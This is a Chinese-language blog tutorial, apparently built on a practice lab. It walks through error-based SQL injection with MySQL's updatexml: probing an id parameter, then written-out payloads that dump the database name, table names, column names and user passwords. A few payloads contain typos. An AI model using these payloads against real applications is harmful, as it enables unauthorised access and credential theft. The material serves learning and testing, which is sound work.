当前位置: 首页 > news >正文

SQL报错注入之updatexml

目录

1.updatexml报错原理

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

3.updatexml报错注入

3.1爆库名

3.2爆表名

3.3爆字段名

3.4爆数据


1.updatexml报错原理

updatexml(xml_doument,XPath_string,new_value)
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

根据结果可以判断出存在数字型注入,并且页面会打印出报错信息,所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符号,所以数据库名为security

3.2爆表名

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index 

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

3.3爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

根据结果可以判断出字段名不全,这是因为updataxml函数只显示32位,所以我们可以用substr函数来慢慢截取来获得所有的字段名 

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢?

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查询直接就爆出users表的列名,可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

3.4爆数据

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml报错注入就结束啦!

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 数据仓库怎么建设?一文详解数仓的建设过程!
  • Haproxy搭建Web群集(群集)
  • c++----初识模板
  • 案例分享-国外UI设计界面赏析
  • 盘点5个PDF 怎么转换成 Word 的实用技巧
  • Elasticsearch 概述
  • SQLiteStudio 连接sqlite3数据库(真机数据库可视化调试)
  • 使用 VueDraggable 创建可拖拽列表的全面指南
  • Web开发-CSS篇-上
  • Python代码之特征工程基础
  • 互联网重构“规则制定权”,周期性谋咒开始轮转!
  • 用Python开发的坦克大战小游戏,高度还原经典(附源码)!
  • Animate软件基本概念:元件(影片剪辑、图形、按钮)
  • uniapp实现可视化图表(轻量、内存小)
  • 【杂谈】-MQTT与HTTP在物联网中的比较:为什么MQTT是更好的选择
  • [分享]iOS开发-关于在xcode中引用文件夹右边出现问号的解决办法
  • “Material Design”设计规范在 ComponentOne For WinForm 的全新尝试!
  • canvas 高仿 Apple Watch 表盘
  • canvas 绘制双线技巧
  • CentOS 7 防火墙操作
  • cookie和session
  • Fundebug计费标准解释:事件数是如何定义的?
  • go append函数以及写入
  • Java编程基础24——递归练习
  • Kibana配置logstash,报表一体化
  • macOS 中 shell 创建文件夹及文件并 VS Code 打开
  • SegmentFault 技术周刊 Vol.27 - Git 学习宝典:程序员走江湖必备
  • SpingCloudBus整合RabbitMQ
  • 初识 beanstalkd
  • 关于Flux,Vuex,Redux的思考
  • 基于OpenResty的Lua Web框架lor0.0.2预览版发布
  • 如何抓住下一波零售风口?看RPA玩转零售自动化
  • 设计模式走一遍---观察者模式
  • 世界编程语言排行榜2008年06月(ActionScript 挺进20强)
  • 智能合约开发环境搭建及Hello World合约
  • nb
  • AI算硅基生命吗,为什么?
  • gunicorn工作原理
  • kubernetes资源对象--ingress
  • Play Store发现SimBad恶意软件,1.5亿Android用户成受害者 ...
  • RDS-Mysql 物理备份恢复到本地数据库上
  • ​1:1公有云能力整体输出,腾讯云“七剑”下云端
  • ​iOS安全加固方法及实现
  • #define、const、typedef的差别
  • (51单片机)第五章-A/D和D/A工作原理-A/D
  • (C语言)fread与fwrite详解
  • (DenseNet)Densely Connected Convolutional Networks--Gao Huang
  • (php伪随机数生成)[GWCTF 2019]枯燥的抽奖
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (三)Hyperledger Fabric 1.1安装部署-chaincode测试
  • (收藏)Git和Repo扫盲——如何取得Android源代码
  • (原創) 博客園正式支援VHDL語法著色功能 (SOC) (VHDL)
  • (轉貼) 2008 Altera 亞洲創新大賽 台灣學生成果傲視全球 [照片花絮] (SOC) (News)
  • .net SqlSugarHelper